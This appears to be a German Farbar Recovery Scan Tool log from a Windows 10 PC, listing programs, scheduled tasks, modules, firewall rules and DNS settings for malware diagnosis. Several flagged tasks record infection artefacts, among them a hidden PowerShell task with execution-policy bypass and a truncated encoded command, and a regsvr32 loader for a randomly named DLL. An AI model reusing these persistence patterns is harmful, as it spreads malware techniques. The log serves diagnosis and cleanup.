Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe 
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {953B092A-5EBD-4F94-9C6E-512C12B3CF5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe  <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {D0B3A7DD-92A8-4BED-A5BF-74245B8AE768} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {D0E80393-B234-4921-839B-C39706BBDD5F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEABCBF8-4763-43D1-883B-86C80CB16A79} - System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwAgADsAOwA7ADsAIAA7ADsAOwA7ADsAOwA7ACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcA (Der Dateneintrag hat 9732 mehr Zeichen). <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-03 17:02 - 2017-05-03 17:03 - 01710080 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe
2017-05-03 17:02 - 2017-05-03 17:03 - 13358272 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Core.dll
2017-05-03 17:02 - 2017-05-03 17:03 - 01200840 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\Office.UI.Xaml.Word.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 00:20 - 2012-08-23 11:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2017-03-14 00:20 - 2014-05-13 13:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2017-03-14 00:20 - 2014-05-13 13:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2017-03-14 00:20 - 2014-05-13 13:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2017-03-14 00:20 - 2012-04-03 18:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2017-05-07 17:13 - 2017-05-17 21:21 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2017-05-19 13:51 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 82.163.143.157 - 82.163.142.159
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{83AD83AC-5138-49A1-AFE6-642DD681957A}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{9F1EF34D-804D-4346-AA62-2A72FA0FBF6F}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{BDC0A943-FFD9-4C31-97CB-2F5C6223930F}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{6208BE91-3EEB-4FD5-A9F6-AAF6B8B6DAD4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{BDBD0D1C-E183-400A-95C5-7EC28883BDC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B0EFBE9B-6683-4F5E-B370-26BC5FBB1834}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B390EB1F-B557-4043-8E63-554A25E1FFA8}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Ghost Recon Wildlands Beta\GRW.exe
FirewallRules: [{4CE2A673-3091-4652-A0F4-EC8E65F46CDC}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division PTS\TheDivision.exe
FirewallRules: [{A8417FA2-B44F-4117-8D45-30BCFD8686E6}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [{100496F8-41F8-47A3-85DD-5D420F581AEB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Sacred 3\sacred3.exe
FirewallRules: [UDP Query User{2E4F3652-EFD6-4881-9213-8EA61F89A46F}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [TCP Query User{88C41D9B-BB60-4F64-BC68-6DAB1AF7FB31}D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base39576\sc2_x64.exe
FirewallRules: [UDP Query User{47CE1527-A9E5-4FA6-8A51-6B1E508DD7AC}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [TCP Query User{13A38046-9894-492B-9138-E3CF3B213870}D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base38996\sc2_x64.exe
FirewallRules: [{99E199FA-1006-4A25-8A08-E28651356CDF}] => (Allow) D:\Programme\Ubisoft\Anno 2205\Bin\Win64\Anno2205.exe
FirewallRules: [{F3A38691-4442-4EAC-B3E6-B9767F22C203}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [{A15E195A-CCA8-4C1D-84C5-546BF8AAE637}] => (Allow) D:\Programme\EA\SimCity\SimCity\SimCity.exe
FirewallRules: [TCP Query User{A6300EE9-EEE9-43B8-B529-D238E94D113B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{35161E84-F39F-429F-8D6F-A6CFC8EC13DF}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{9CE73BB9-D886-4EA9-9EDD-54D04E01DB68}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C60179E6-4096-438F-A0AE-D7E540CE18C9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A5BC860D-355B-4935-99F7-09C0A701AAAA}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{62A800D2-8909-45FC-BFD5-612EF096C6F1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{24A88AFE-6316-461C-984E-4AF8F05FCC96}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{FF456D46-8990-4A73-82F7-4A5484372E42}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{CCDDE9C4-05CA-48D1-90C8-2D615BC7B643}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{607A7BED-54D2-4F98-B9A6-4F5D91E07585}] => (Allow) D:\Programme\Blizzard\StarCraft II\StarCraft II.exe
FirewallRules: [{DBABDDB1-A8F5-4509-A5A6-1A9F0EF2F69D}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{66B9313C-1DF5-470C-B1BD-9064863CA77A}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\Anno5.exe
FirewallRules: [{38C3B3D0-D3E0-4BB2-8D00-595270146FE7}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{71C075D1-31A5-4E48-B456-75C0CC247DA6}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\AutoPatcher.exe
FirewallRules: [{859B27CC-891C-45EC-8310-BCCAAC722A85}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [{FC73742C-58EE-43B8-B2E2-0755BDB79FAB}] => (Allow) C:\Program Files (x86)\Ubisoft\Related Designs\ANNO 2070\InitEngine.exe
FirewallRules: [TCP Query User{D780C36A-DADD-4902-950C-1B44C2B4591C}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{6BF43327-BDB7-4AB4-898E-8A25BE985091}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{3F0F651B-1103-4AE2-9098-9BCC4F26404D}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [{203174F0-92DD-4D57-B97E-47C4CAC797B9}] => (Allow) D:\Programme\Paradox Interactive\Cities Skyline\Cities.exe
FirewallRules: [TCP Query User{DAB2A3D3-0749-4FBF-BA46-7878A1B608DF}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [UDP Query User{2538DCE0-9E21-47AC-8348-A452790F29F9}D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe] => (Allow) D:\programme\blizzard\starcraft ii\versions\base32283\sc2.exe
FirewallRules: [{51A9B374-5A57-46AB-A962-C889763A43AD}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{67DCCF13-0AEA-4A47-8084-823442F272BB}] => (Allow) D:\Programme\SteamLibrary\steamapps\common\Besiege\Besiege.exe
FirewallRules: [{300F8BBD-78E2-41E0-8EC4-16DF8E59E651}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{C5360BE6-1303-4A0E-8023-CC62F60B1E04}] => (Allow) D:\Programme\Ubisoft\Anno4.exe
FirewallRules: [{9274C44A-8563-4D10-AD7B-8DF46B5A8A84}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{FC814241-9258-4F19-AF41-DB88E23957C1}] => (Allow) D:\Programme\Ubisoft\Addon.exe
FirewallRules: [{0B9C568A-9F54-4F5F-8A13-29E3E60DFD10}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{0A57F8DB-B618-48DA-A350-95E445171171}] => (Allow) D:\Programme\Ubisoft\tools\Anno4Web.exe
FirewallRules: [{B609DA77-EEAE-4331-AF04-D6B0B12DD462}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{7F026620-DD5A-46CF-A2A1-E22FB29A9F0F}] => (Allow) D:\Programme\Ubisoft\tools\AddonWeb.exe
FirewallRules: [{6207A230-EB6A-4610-B892-DF526C5DA9CB}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{6413A299-3AE2-4728-8D88-DBC7F4693304}] => (Allow) D:\Programme\Ubisoft\tools\Benchmark.exe
FirewallRules: [{8395ECDA-6B23-440A-961A-1338B31E9BCF}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{F954F9EC-FC53-42E6-8C62-5FAAB7F337F6}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Anno4.exe
FirewallRules: [{E6D4C42C-CFAE-433E-A5C8-75DD628070A2}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{DA17C889-BA52-4AEA-B1F7-56B213754083}] => (Allow) D:\Programme\Ubisoft\Anno 1404\Addon.exe
FirewallRules: [{B064A02F-82D3-46C7-BE5E-4847D6F8F3DD}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{46A60120-A927-4D76-888D-6D7D4D4928C8}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Anno4Web.exe
FirewallRules: [{614BDF81-34E7-4EF0-AF9D-124919FC7689}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{D83D6FE6-C127-45CA-9089-CB5A015F1059}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\AddonWeb.exe
FirewallRules: [{8C525B9B-2F76-4D2A-88BF-33045C4BF9F4}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [{8170164A-B9FD-4092-A573-9EEFE3E8D466}] => (Allow) D:\Programme\Ubisoft\Anno 1404\tools\Benchmark.exe
FirewallRules: [TCP Query User{D3C7FE0D-703D-47B1-8FA2-AB9592BF1E7B}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6BF3876D-F5A1-4D45-B983-F240E0C30606}C:\users\dino\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\dino\appdata\roaming\spotify\spotify.exe
FirewallRules: [{3495CC5B-8440-473C-99FE-BB14A3B532D1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Wiederherstellungspunkte =========================

07-05-2017 23:26:13 Windows Update
12-05-2017 20:27:56 Windows Update
17-05-2017 21:17:54 Windows Update
19-05-2017 14:17:08 Revo Uninstaller's restore point - Freelancer
19-05-2017 14:19:32 Revo Uninstaller's restore point - Microsoft Office Professional Plus 2013
19-05-2017 14:19:39 Removed Microsoft Office Professional Plus 2013
19-05-2017 14:19:44 PROPLUS

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/19/2017 02:17:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}

